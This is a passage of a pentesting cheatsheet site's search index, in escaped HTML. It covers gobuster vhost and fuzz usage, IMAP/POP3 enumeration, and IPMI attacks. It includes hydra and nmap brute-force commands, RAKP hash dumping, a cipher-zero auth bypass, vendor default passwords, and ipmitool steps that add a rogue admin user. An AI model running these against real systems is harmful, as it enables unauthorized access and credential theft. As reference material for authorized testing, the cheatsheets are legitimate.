wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Append domain to wordlist entries\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --append-domain \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --domain example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter out specific response length (removes default/fallback page)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --append-domain \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --exclude-length \u003cspan style=\"color:#ae81ff\"\u003e290\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k --append-domain\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"vhost-flags\"\u003evhost Flags\u003c/h3\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--append-domain\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAppend base domain to each word\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--domain \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBase domain to append\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--exclude-length \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExclude responses of this content length\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"fuzz--generic-fuzzing\"\u003efuzz — Generic Fuzzing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Fuzz a parameter value\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster fuzz -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/page.php?id=FUZZ\u0026#34;\u003c/span\u003e -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Fuzz with status filter\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster fuzz -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/FUZZ.php\u0026#34;\u003c/span\u003e -w wordlist.txt -b \u003cspan style=\"color:#ae81ff\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directories\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/common.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Files (with extensions)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual hosts / subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-runs\"\u003eExample Full Runs\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directory + file scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -u http://example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -x php,html,txt,bak,zip \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e -e -l \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -o gobuster_dir.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual host discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -u http://example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --append-domain \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --exclude-length \u003cspan style=\"color:#ae81ff\"\u003e290\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -o gobuster_vhost.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"gobuster"},{"content":"IMAP / POP3 Enumeration Cheatsheet Default Ports:\nIMAP: 143 (plain), 993 (SSL/TLS) POP3: 110 (plain), 995 (SSL/TLS) Banner Grabbing nc -nv \u0026lt;ip\u0026gt; 110 # POP3 nc -nv \u0026lt;ip\u0026gt; 143 # IMAP openssl s_client -connect \u0026lt;ip\u0026gt;:993 # IMAPS openssl s_client -connect \u0026lt;ip\u0026gt;:995 # POP3S openssl s_client -connect \u0026lt;ip\u0026gt;:143 -starttls imap # STARTTLS IMAP POP3 Commands (Manual) USER \u0026lt;username\u0026gt; PASS \u0026lt;password\u0026gt; STAT # Mailbox stats (message count, total size) LIST # List all messages with sizes LIST \u0026lt;n\u0026gt; # Info for message n RETR \u0026lt;n\u0026gt; # Retrieve (download) message n DELE \u0026lt;n\u0026gt; # Mark message n for deletion TOP \u0026lt;n\u0026gt; \u0026lt;lines\u0026gt; # Retrieve headers + first N lines of message n UIDL # Unique ID listing for all messages NOOP # Keep-alive RSET # Unmark any deletions QUIT # Commit deletes and disconnect IMAP Commands (Manual) a LOGIN \u0026lt;user\u0026gt; \u0026lt;pass\u0026gt; a CAPABILITY # Show server capabilities a LIST \u0026#34;\u0026#34; \u0026#34;*\u0026#34; # List all mailboxes a SELECT INBOX # Select inbox a STATUS INBOX (MESSAGES UNSEEN) # Inbox stats a FETCH 1:* (FLAGS) # List messages with flags a FETCH 1 (BODY[]) # Download full message 1 a FETCH 1 (BODY[HEADER]) # Headers only a FETCH 1 (BODY[TEXT]) # Body only a SEARCH ALL # Search all messages a SEARCH UNSEEN # Search unread messages a EXAMINE INBOX # Read-only select a LOGOUT Nmap Scripts nmap -p 110,143,993,995 --script imap-capabilities \u0026lt;ip\u0026gt; nmap -p 110,143,993,995 --script pop3-capabilities \u0026lt;ip\u0026gt; nmap -p 110 --script pop3-brute \u0026lt;ip\u0026gt; nmap -p 143 --script imap-brute \u0026lt;ip\u0026gt; nmap -p 993,995 --script imap-ntlm-info \u0026lt;ip\u0026gt; # Windows NTLM info leak Brute Force hydra -l \u0026lt;user\u0026gt; -P wordlist.txt imap://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt pop3://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 993 -S imap://\u0026lt;ip\u0026gt; # IMAPS hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 995 -S pop3://\u0026lt;ip\u0026gt; # POP3S curl Mail Access # List mailboxes curl -k \u0026#39;imaps://\u0026lt;ip\u0026gt;\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # List INBOX contents curl -k \u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # Read specific message curl -k \u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX;MAILINDEX=1\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # POP3 via curl curl -k \u0026#39;pop3s://\u0026lt;ip\u0026gt;\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; curl -k \u0026#39;pop3s://\u0026lt;ip\u0026gt;/1\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # Download message 1 ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/imap-pop3/","summary":"\u003ch1 id=\"imap--pop3-enumeration-cheatsheet\"\u003eIMAP / POP3 Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIMAP: 143 (plain), 993 (SSL/TLS)\u003c/li\u003e\n\u003cli\u003ePOP3: 110 (plain), 995 (SSL/TLS)\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing\"\u003eBanner Grabbing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e110\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# POP3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e143\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# IMAP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:993 \u003cspan style=\"color:#75715e\"\u003e# IMAPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:995 \u003cspan style=\"color:#75715e\"\u003e# POP3S\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:143 -starttls imap \u003cspan style=\"color:#75715e\"\u003e# STARTTLS IMAP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"pop3-commands-manual\"\u003ePOP3 Commands (Manual)\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eUSER \u0026lt;username\u0026gt;\nPASS \u0026lt;password\u0026gt;\nSTAT # Mailbox stats (message count, total size)\nLIST # List all messages with sizes\nLIST \u0026lt;n\u0026gt; # Info for message n\nRETR \u0026lt;n\u0026gt; # Retrieve (download) message n\nDELE \u0026lt;n\u0026gt; # Mark message n for deletion\nTOP \u0026lt;n\u0026gt; \u0026lt;lines\u0026gt; # Retrieve headers + first N lines of message n\nUIDL # Unique ID listing for all messages\nNOOP # Keep-alive\nRSET # Unmark any deletions\nQUIT # Commit deletes and disconnect\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"imap-commands-manual\"\u003eIMAP Commands (Manual)\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ea LOGIN \u0026lt;user\u0026gt; \u0026lt;pass\u0026gt;\na CAPABILITY # Show server capabilities\na LIST \u0026#34;\u0026#34; \u0026#34;*\u0026#34; # List all mailboxes\na SELECT INBOX # Select inbox\na STATUS INBOX (MESSAGES UNSEEN) # Inbox stats\na FETCH 1:* (FLAGS) # List messages with flags\na FETCH 1 (BODY[]) # Download full message 1\na FETCH 1 (BODY[HEADER]) # Headers only\na FETCH 1 (BODY[TEXT]) # Body only\na SEARCH ALL # Search all messages\na SEARCH UNSEEN # Search unread messages\na EXAMINE INBOX # Read-only select\na LOGOUT\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 110,143,993,995 --script imap-capabilities \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 110,143,993,995 --script pop3-capabilities \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e110\u003c/span\u003e --script pop3-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e143\u003c/span\u003e --script imap-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 993,995 --script imap-ntlm-info \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Windows NTLM info leak\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt imap://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt pop3://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e993\u003c/span\u003e -S imap://\u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# IMAPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e995\u003c/span\u003e -S pop3://\u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# POP3S\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"curl-mail-access\"\u003ecurl Mail Access\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List mailboxes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;imaps://\u0026lt;ip\u0026gt;\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List INBOX contents\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Read specific message\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX;MAILINDEX=1\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POP3 via curl\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;pop3s://\u0026lt;ip\u0026gt;\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;pop3s://\u0026lt;ip\u0026gt;/1\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Download message 1\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"IMAP POP3"},{"content":"IPMI Enumeration Cheatsheet Default Port: 623 (UDP)\nWhat is IPMI? Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). Can give full remote control even if OS is down.\nDetection \u0026amp; Version nmap -sU -p 623 \u0026lt;ip\u0026gt; nmap -sU -p 623 --script ipmi-version \u0026lt;ip\u0026gt; Nmap Scripts nmap -sU -p 623 --script ipmi-version \u0026lt;ip\u0026gt; nmap -sU -p 623 --script ipmi-cipher-zero \u0026lt;ip\u0026gt; # Check for Cipher 0 auth bypass Metasploit Modules # Version detection use auxiliary/scanner/ipmi/ipmi_version set RHOSTS \u0026lt;ip\u0026gt; run # Dump RAKP hashes (no auth needed) use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS \u0026lt;ip\u0026gt; run # Cipher 0 auth bypass (unauthenticated admin access) use auxiliary/scanner/ipmi/ipmi_cipher_zero set RHOSTS \u0026lt;ip\u0026gt; run ipmitool (Direct Interaction) # Version/status ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin chassis status # List users ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user list # LAN config ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin lan print # Power control ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin power status ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin power reset # Add user (post-compromise) ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user set name 4 hacker ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user set password 4 Password1 ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user priv 4 4 # Admin priv ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user enable 4 Hash Cracking (After RAKP Dump) # Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1 hashcat -m 7300 hashes.txt wordlist.txt hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule Default Credentials Vendor / Interface Username Default Password Dell iDRAC root calvin HP iLO Administrator (printed on pull tab) Supermicro IPMI ADMIN ADMIN IBM IMM USERID PASSW0RD Cisco CIMC admin password Intel RMM admin (blank) Key Vulnerabilities Issue Description Cipher 0 Allows unauthenticated auth bypass — attacker can set any password RAKP hash dump IPMI spec allows anyone to request auth hash → offline crack Default creds Most systems ship with known default credentials Anonymous auth Some BMCs allow completely anonymous access ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/ipmi/","summary":"\u003ch1 id=\"ipmi-enumeration-cheatsheet\"\u003eIPMI Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 623 (UDP)\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWhat is IPMI?\u003c/strong\u003e Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). Can give full remote control even if OS is down.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection--version\"\u003eDetection \u0026amp; Version\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e623\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e623\u003c/span\u003e --script ipmi-version \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e623\u003c/span\u003e --script ipmi-version \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e623\u003c/span\u003e --script ipmi-cipher-zero \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Check for Cipher 0 auth 